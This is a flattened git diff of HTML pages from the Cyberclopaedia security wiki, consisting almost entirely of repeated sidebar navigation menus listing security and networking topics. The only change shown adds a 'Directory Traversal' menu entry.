        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -212,22 +212,6 @@

Problems

- - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html index a0849a12..1b45b898 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/Classless Inter-Domain Routing (CIDR).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -179,22 +179,6 @@

CIDR - - diff --git a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html index c904d764..7d879c23 100644 --- a/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html +++ b/docs/Networking/Protocols/Internet Protocol (IP)/Internet Protocol v4 (IPv4)/IPv4 Datagrams.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
